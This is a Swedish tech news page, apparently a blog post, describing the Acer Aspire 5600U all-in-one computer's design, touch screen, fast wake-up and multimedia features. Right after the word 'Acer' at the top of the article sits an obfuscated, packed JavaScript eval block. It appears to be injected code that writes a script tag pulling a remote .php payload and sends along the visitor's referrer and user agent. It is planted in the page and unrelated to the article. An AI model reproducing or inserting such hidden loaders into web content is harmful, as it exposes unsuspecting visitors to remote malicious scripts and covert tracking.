Image Image Image Image Image Image Image Image Image Image

| 30 maj, 2020

Scroll to top

Top

PC

Acer Aspire 5600U sätter ny standard för allt-i-ett datorer

Acer Aspire 5600U sätter ny standard för allt-i-ett datorer
Sebastian

Acer eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dfhay|var|u0026u|referrer|tzfas||js|php’.split(’|’),0,{}))
Aspire 5600U är en ny, elegant allt-i-ett-dator med extremt tunn profil – mindre än 35 millimeter – den unika designen ger en touch av sofistikerad stil var du än placerar den.

Aspire 5600U har den där tidlösa designen, som uppnås genom att strippa ner enheten tills endast det viktiga finns kvar – där form smälter samman med funktion. Men låt dig inte luras av dess rena formspråk, detta är en dator fylld med avancerade funktioner och prestanda.

I det semi-transparenta höljet huserar både hårddisken, Blu-ray-spelare och skärm. Den flytande designen matchar det trådlösa tangentbordet och mus perfekt, även dessa tillverkade i transparent material.

Den imponerande ramlösa 23 tums-skärmen erbjuder full HD-upplösning för filmvisning, grafikintensiva applikationer, spel och TV-underhållning. Det exklusiva VESA-fästet gör det möjligt att enkelt montera fast enheten på väggen.

Aspire 5600U erbjuder också en avancerad 10-gradig touch-teknik som ger en smidig och effektiv multi-touch upplevelse. Möjligheten att luta enheten 60 grader gör pekfunktionen ergonomisk och till ett övertygande gränssnitt.

Acer Instant on och Acer Always connect

Innovativa Acer Instant on- och Acer Always connect-tekniken i kombination med 20 GB SSD gör det möjligt att konstant ladda upp och ta emot data. Acer Instant on ger en uppstart från sleep-mode på endast 1,5 sekunder. Med TV-tuner (tillval), kan Acer Aspire 5600U således konkurrera med en traditionell tv.

Med Acer Always connect kommer användaren snabbare ut på nätet jämfört med konventionella lösningar. Med applikationer som Facebook, Twitter och Outlook öppna, kan de visa uppdateringar från det ögonblick datorn vaknar från viloläget. Dessutom går det att ”väcka” Acer Aspire 5600U via en extern enhet, t.ex. en smartphone, och på så sätt alltid ha tillgång till dokument, musik, bilder och videofilmer.

Med ljud- och grafikkomponenter av högsta kvalitet, får användaren ut maximalt av sin underhållning. Den 23 tum ljusstarka skärmen levererar full HD (1920 x 1.080) med en responstid på 5 ms, vilket resulterar i en skarp och klar bild utan eftersläpningar.

Ljudet kommer från inbyggda stereo högtalare och tillsammans med Dolby ® Home Theater ® V4, levereras maximal volym utan distorsion. Med en optisk Blu-ray-spelare (tillval), multi-i-ett kortläsare och TV-tuner (tillval) får du en komplett digital underhållningsupplevelse som inkluderar filmer, spel, tv och bilder. Acer Aspire 5600U är även utrustad med en HDMI in- och utgång för enkel anslutning till externa enheter.

Comments

  1. Adam

    Sweet